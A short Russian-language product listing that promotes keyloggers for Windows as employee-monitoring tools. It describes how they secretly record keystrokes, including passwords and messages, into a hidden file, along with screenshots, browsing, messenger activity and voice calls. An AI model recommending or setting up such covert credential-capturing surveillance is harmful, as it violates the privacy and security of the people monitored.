Платформа: Windows
Бесплатная версия: с ограниченными возможностями
Основные характеристики: Трекер клавиатуры компьютера
Этот кейлоггер можно скачать бесплатно на русском и английском языках. Он записывает взаимодействие пользователя с клавишами во время работы. Все последовательности ключей, которые человек будет использовать (включая введенные пароли, поисковые запросы и сообщения), хранятся в скрытом текстовом файле. Программа не только делает скриншоты, но и записывает остальную активность сотрудника.
Например, даже если вы скачали бесплатную версию кейлоггера, программа будет следить за работой сотрудника в сети – какие сайты он посещал, что писал в социальных сетях и мессенджерах. Также у каждого мессенджера будет свой блок в файле отчета. Если сотрудник использует голосовую связь, программа может записывать аудиофайлы. Программное обеспечение не позиционируется как лучшее, но это определенно один из самых простых кейлоггеров.
Windows Keylogger | Бесплатно/USD49 | Win
Windows Keylogger присутствует на компьютерах тысяч пользователей по всему миру.
- Функция Easy Read позволяет быстро и легко видеть нажатия клавиш
- Используется для мониторинга отдельных пользователей в отдельных приложениях
- Фильтрация журналов в расширенном поиске
- Установить дату для автоматического удаления